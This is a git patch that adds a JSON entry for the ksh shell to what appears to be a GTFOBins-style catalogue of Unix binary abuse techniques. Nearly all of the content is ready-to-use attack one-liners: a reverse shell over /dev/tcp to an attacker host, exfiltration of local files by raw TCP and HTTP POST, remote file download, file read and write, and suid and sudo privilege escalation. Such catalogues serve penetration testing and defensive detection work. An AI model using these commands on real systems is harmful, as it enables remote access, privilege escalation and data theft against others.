From 99b5a302d78f2a491c0d6feed91f879e6f9fb3fe Mon Sep 17 00:00:00 2001
From: t0thkr1s <t0thkr1s@icloud.com>
Date: Thu, 9 Jan 2020 18:00:29 +0100
Subject: [PATCH] add data for ksh

---
 data/ksh.json | 60 +++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 60 insertions(+)
 create mode 100644 data/ksh.json

diff --git a/data/ksh.json b/data/ksh.json
new file mode 100644
index 0000000..c289a75
--- /dev/null
+++ b/data/ksh.json
@@ -0,0 +1,60 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "ksh"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "ksh -c 'ksh -i > /dev/tcp/[host]/[port] 2>&1 0>&1'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "ksh -c 'echo -e \"POST / HTTP/0.9\\n\\n$(cat [file])\" > /dev/tcp/[host]/[port]'\n"
+      },
+      {
+        "description": "Send local file using a TCP connection. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file.",
+        "code": "ksh -c 'cat [file] > /dev/tcp/[host]/[port]'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "ksh -c '{ echo -ne \"GET /[file] HTTP/1.0\\r\\nhost: [host]\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n    3<>/dev/tcp/[host]/[port] \\\n    | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } > [file]'\n"
+      },
+      {
+        "description": "Fetch remote file using a TCP connection. Run 'nc -l -p [port] < [file]' on the attacker box to send the file.",
+        "code": "ksh -c 'cat < /dev/tcp/[host]/[port] > [file]'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "ksh -c 'echo DATA > [file]'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "It trims trailing newlines.",
+        "code": "ksh -c 'echo \"$(<[file])\"'\n"
+      },
+      {
+        "description": "It trims trailing newlines.",
+        "code": "ksh -c $'read -r -d \\x04 < [file]; echo \"$REPLY\"'\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./ksh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ksh"
+      }
+    ]
+  }
+}
\ No newline at end of file